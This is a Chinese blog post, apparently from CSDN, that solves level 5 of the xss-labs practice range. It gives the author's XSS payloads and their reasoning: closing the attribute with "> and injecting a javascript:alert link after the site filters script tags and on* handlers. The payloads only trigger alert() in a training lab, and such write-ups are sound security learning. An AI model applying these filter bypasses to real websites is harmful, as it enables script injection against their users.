XSS-5注入靶场闯关(小游戏)——第五关

已于 2023-02-04 09:43:29 修改
阅读量276 收藏
点赞数 1
文章标签: xss 前端
于 2023-02-03 13:05:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39330735/article/details/128864531
版权

一、首先先尝试<script>alert(123)</script>

查看源代码:可以看到,他前面有一个引号,并且<script>被改写成<scr_ipt>

 结论:

1、可以使用  ">  把前面的语句形成闭合

2、<script>不可以使用

3、前面形成闭合,则后面需要新的标签,所以下一步尝试

<img src=1 οnerrοr=alert(666)>
<svg src=1 οnlοad=alert(666)>
<a href="javascript:alert(1)"> 

二、尝试"><img src=1 οnerrοr=alert(666)><!--    (<!--是把后面的括号注释,强迫症,不些也没事)

查看源代码可以看到,o后面也会被加入下划线,所以onclick、onmouseover、onerror、onload都无法使用

 三、尝试"><a href="javascript:alert(1)">123</a><!--

 

 点击连接通关!!!

 查看源码可以看到,这里已经添加了一个<a>标签进去。

W金刚葫芦娃W
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss-labs-master.zip(xss注入游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss challenge 下载 xss 实践通小游戏,以闯关的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通小游戏,以闯关的形式检验xss掌握程度。
XSS-8注入靶场闯关(小游戏)——第八
qq_39330735的博客
02-04 848
XSS-8注入靶场闯关(小游戏)——第八,通详解,HTML的十进制实体字符串绕过
XSS-10注入靶场闯关(小游戏)——第十
qq_39330735的博客
02-04 348
XSS-game-10隐藏入口注入,需要在源代码查找到入口的html标签,然后修改对应的属性让其显示出来。然后再注入payload
XSS-14、15注入靶场闯关(小游戏)——第十四、五
qq_39330735的博客
02-04 982
XSS-15注入靶场闯关(小游戏)——第十五,文件链接注入详解
安全小记-sqli-labs闯关
dzqxwzoe的博客
06-14 778
SQLI,sql injection,我们称之为sql注入。何为sql,英文:Structured QueryLanguage,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL,Oracle以及Postgresql。Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入
XSS实验
IOE_270的博客
10-29 28
xss-labs
OWASP安全练习靶场juice shop-更新中
qq_53058639的博客
04-11 1733
Juice Shop是用Node.js,Express和Angular编写的。这是第一个 完全用 JavaScript 编写的应用程序,列在。该应用程序包含大量不同的黑客挑战 用户应该利用底层的困难 漏洞。黑客攻击进度在记分板上跟踪。找到这个记分牌实际上是(简单的)挑战之一!除了黑客和意识培训用例外,渗透测试 代理或安全扫描程序可以将 Juice Shop 用作“几内亚” pig“-应用程序来检查他们的工具如何应对JavaScript 密集型应用程序前端和 REST API。
ctf入门(转载)
wxy201008的博客
08-28 2137
CTF入门指南(0基础) ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类型: Web 密码学 pwn 程序的逻辑分析,漏洞利用windows、linux、小型机等 misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相的大数据 reverse 逆向windows、linux类 ppc 编程类的 国内外著名比赛 国外: 国内:xctf联赛 0ctf上海国...
掌控安全Web安全微专业笔记
热门推荐
xcsxchen
10-26 1万+
1-3 Web通信原理 一、基本知识介绍 IP 正统定义:互联网协议地址,缩写为IP地址,是分配给用户上网使用的网际协议的设备的数字标签。 老师理解:ip实际上就是地址,如果我想到你家去玩,那么我肯定要知道你家住在哪里,ip实际上就是你电脑的地址,在网络上可以通过ip来访问你的计算机。 ip有内网和公网的概念。什么是内网?什么是公网? 打个比方: 你家的门牌号那就是个公网地址,X省X市X街道X号,别人看到这个地址就能找到你家 内网地址是什么妮,假设你住的是一个大楼,比如住401房间,那么只有同一个大楼里面的
CTF入门指南(0基础)
weixin_34218579的博客
04-11 411
ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类型: Web 密码学 pwn 程序的逻辑分析,漏洞利用windows、linux、小型机等 misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相的大数据 reverse 逆向windows、linux类 ppc 编程类的 国内外著名...
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关小游戏,无需连接数据库,共20,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
xss-labs靶场,直接放到www目录下直接用,超方便
09-24
XSS-Labs靶场提供了源码,这对于学习和研究XSS漏洞至重要。通过查看源码,用户可以了解漏洞是如何产生的,以及开发者在哪些地方没有进行适当的输入验证和编码转义。这对于提升Web应用的安全编程技巧大有裨益。 **...
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 605
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
反射型与dom型的xss的区别【源码分析】
2301_80064376的博客
07-26 2078
攻击点反射型 XSS:恶意代码通过 HTTP 请求发送到服务器,并在服务器响应中反射回客户端。DOM 型 XSS:恶意代码直接在客户端(浏览器)中通过 JavaScript 动态生成和执行。执行位置反射型 XSS:服务器响应时执行。DOM 型 XSS:客户端 JavaScript 处理时执行。防御重点反射型 XSS:服务器端的输入验证和输出编码。DOM 型 XSS:客户端 JavaScript 的输入验证和安全的 DOM 操作。
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 392
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
js、ts、argular、nodejs学习心得
最新发布
07-30 176
工作中需要前端argular开发桌面程序,后端用nodejs开发服务器,商用软件架构。
XSS-Labs靶场20全攻略:无限制payload实战
第一的挑战主要涉及基础XSS注入。源代码展示了对用户提交的`$str`变量未进行任何过滤,这使得恶意用户可以利用`<script>alert(/xss/)</script>`这样的payload注入脚本,弹出警告信息。这提醒我们在实际开发中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值